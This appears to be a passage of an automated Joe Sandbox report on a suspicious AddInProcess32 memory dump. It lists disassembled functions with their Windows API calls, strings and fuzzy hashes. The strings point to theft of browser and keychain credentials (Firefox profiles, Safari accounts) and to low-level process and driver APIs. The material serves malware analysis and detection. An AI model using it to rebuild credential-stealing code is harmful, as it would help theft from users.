                                            • API String ID:
                                            • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                            • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                            • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                            • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                            APIs
                                            • memset.MSVCRT ref: 00445426
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                            • String ID:
                                            • API String ID: 1828521557-0
                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                            APIs
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                              • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                            • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ??2@FilePointermemcpy
                                            • String ID:
                                            • API String ID: 609303285-0
                                            • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                            • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                            • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                            • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _wcsicmp
                                            • String ID:
                                            • API String ID: 2081463915-0
                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                            APIs
                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateErrorHandleLastRead
                                            • String ID:
                                            • API String ID: 2136311172-0
                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                            APIs
                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                            • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ??2@??3@
                                            • String ID:
                                            • API String ID: 1936579350-0
                                            • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                            • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                            APIs
                                            • GetLastError.KERNEL32 ref: 004182D7
                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                            • LocalFree.KERNEL32(?), ref: 00418342
                                            • free.MSVCRT ref: 00418370
                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                            • String ID: OsError 0x%x (%u)
                                            • API String ID: 2360000266-2664311388
                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                            APIs
                                            • GetVersionExW.KERNEL32(?), ref: 004173BE
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Version
                                            • String ID:
                                            • API String ID: 1889659487-0
                                            • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                            • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                            • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                            • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                            APIs
                                            • _wcsicmp.MSVCRT ref: 004022A6
                                            • _wcsicmp.MSVCRT ref: 004022D7
                                            • _wcsicmp.MSVCRT ref: 00402305
                                            • _wcsicmp.MSVCRT ref: 00402333
                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                            • memset.MSVCRT ref: 0040265F
                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                            • API String ID: 577499730-1134094380
                                            • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                            • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                            • GetDC.USER32 ref: 004140E3
                                            • wcslen.MSVCRT ref: 00414123
                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                            • _snwprintf.MSVCRT ref: 00414244
                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                            • String ID: %s:$EDIT$STATIC
                                            • API String ID: 2080319088-3046471546
                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                            APIs
                                            • EndDialog.USER32(?,?), ref: 00413221
                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                            • memset.MSVCRT ref: 00413292
                                            • memset.MSVCRT ref: 004132B4
                                            • memset.MSVCRT ref: 004132CD
                                            • memset.MSVCRT ref: 004132E1
                                            • memset.MSVCRT ref: 004132FB
                                            • memset.MSVCRT ref: 00413310
                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                            • memset.MSVCRT ref: 004133C0
                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                            • wcscpy.MSVCRT ref: 0041341F
                                            • _snwprintf.MSVCRT ref: 0041348E
                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                            • SetFocus.USER32(00000000), ref: 004134B7
                                            Strings
                                            • {Unknown}, xrefs: 004132A6
                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                            • API String ID: 4111938811-1819279800
                                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                            APIs
                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                            • EndDialog.USER32(?,?), ref: 0040135E
                                            • DeleteObject.GDI32(?), ref: 0040136A
                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                            • ShowWindow.USER32(00000000), ref: 00401398
                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                            • String ID:
                                            • API String ID: 829165378-0
                                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                            APIs
                                            • memset.MSVCRT ref: 00404172
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • wcscpy.MSVCRT ref: 004041D6
                                            • wcscpy.MSVCRT ref: 004041E7
                                            • memset.MSVCRT ref: 00404200
                                            • memset.MSVCRT ref: 00404215
                                            • _snwprintf.MSVCRT ref: 0040422F
                                            • wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 0040426E
                                            • memset.MSVCRT ref: 004042CD
                                            • memset.MSVCRT ref: 004042E2
                                            • _snwprintf.MSVCRT ref: 004042FE
                                            • wcscpy.MSVCRT ref: 00404311
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                            • API String ID: 2454223109-1580313836
                                            • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                            • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                            APIs
                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                            • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                            • API String ID: 4054529287-3175352466
                                            • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                            • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                            APIs
                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressProc$HandleModule
                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                            • API String ID: 667068680-2887671607
                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _snwprintf$memset$wcscpy
                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                            • API String ID: 2000436516-3842416460
                                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                            APIs
                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
